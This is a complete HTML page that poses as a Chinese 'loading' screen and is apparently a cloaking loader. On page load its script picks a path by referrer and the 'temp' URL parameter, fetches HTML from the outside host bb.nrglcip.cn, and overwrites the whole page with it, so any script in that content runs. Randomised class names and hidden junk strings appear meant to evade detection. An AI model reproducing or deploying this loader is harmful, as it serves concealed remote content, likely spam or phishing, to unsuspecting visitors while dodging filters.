<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .i6aFOcSLB1 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .i6aFOcSLB1 .bWgaDUXw8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .i6aFOcSLB1 .content {
            line-height: 50px;
            text-align: center
        }

        .i6aFOcSLB1 .img {
            width: 100%
        }

        .i6aFOcSLB1 .IaDazH489 {
            text-align: center
        }

        .i6aFOcSLB1 .IaDazH489 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .i6aFOcSLB1 .IaDazH489 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .i6aFOcSLB1 .IaDazH489 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .i6aFOcSLB1 .IaDazH489 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .i6aFOcSLB1 .IaDazH489 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .i6aFOcSLB1 .IaDazH489 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .i6aFOcSLB1 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VcmlqsBhYVO(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var qTYLjs = VcmlqsBhYVO('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ qTYLjs +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ qTYLjs +".html?a=share";
		}
		
        NPPZjMOcn=url+"#"+new Date().getTime();
        NPPZjMOcn && function() {
            $.get(NPPZjMOcn, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >vKLBg5HVNPF5IZ4</ul>
<span style='display:none'>deFtrfnU3ZHTBZBRZukjtf35LAITmjaaz6Oo0VnJCl7EKCCunGV9AtJhle9lTvO4JTeFaqgd6BVrJdx94IT2FLhK9iOcd8aZk</span>
<span style='display:none'>deFtrfnU3ZHTBZBRZukjtf35LAITmjaaz6Oo0VnJCl7EKCCunGV9AtJhle9lTvO4JTeFaqgd6BVrJdx94IT2FLhK9iOcd8aZk</span>
<h1 style='display:none' >Z2mwlY0Fni1UTuyQd6d0vUsZokxsjhcCEcec95dXcCacTubOsUIPzgfnQD94ZUXhA79IZd</h1>
<ul style='display:none' >vKLBg5HVNPF5IZ4</ul>
<a  href='#' style='display:none'>icjRjmYwGIgsRNdLQHvlRlwHvMCe6YCYCBJeog1BZzacGzlAyHUsTXKV5mw0GNYqHKZ1O</a><div class="i6aFOcSLB1">
    <div class="bWgaDUXw8">
        <div class="IaDazH489">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >JMUP9IoABtnDQo17E0JozsuPR9vx</li>
<div style='display:none'>qhYnoVj1lGoZIS8hdg4s2NMzTfEkWROSAzC9F4vFa3PbL9PPHxnF9wLULb8Nh0UoMOKvsfOshbc3WyN2H0AGREJm60bD3</div>
<h1 style='display:none' >MD6RaDMhTfdvcdcpxDjghgKXKXKLCYgx9Bj0k3mmYgYMTTT2fMQS5nhpy7vN74Sk1Zy9T9M1t6wrFSo8I</h1></body>
</html>